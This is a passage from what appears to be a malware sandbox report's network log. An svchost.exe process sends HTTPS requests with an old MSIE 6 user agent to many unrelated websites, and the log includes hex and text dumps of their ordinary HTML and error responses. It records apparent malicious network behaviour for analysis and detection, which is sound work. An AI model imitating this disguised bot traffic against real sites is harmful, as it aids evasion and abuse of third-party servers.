                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2879INData Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                        Data Ascii: /div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2880INData Raw: 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: n 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2881INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: <div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div cla
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2883INData Raw: 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e
                                                                                                                                                                                                                                                                        Data Ascii: class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" />
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2884INData Raw: 34 61 37 0d 0a 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: 4a7nc="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; botto
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2885INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        187192.168.2.62107138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2885OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2885INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        188192.168.2.6210691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:35 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2887INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2903INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2919INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2935INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        189192.168.2.62113138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2886INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        19192.168.2.652125185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC248OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC281INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC281INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        190192.168.2.62116185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2935OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2935INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2936INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        191192.168.2.620815.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2936OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2937INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
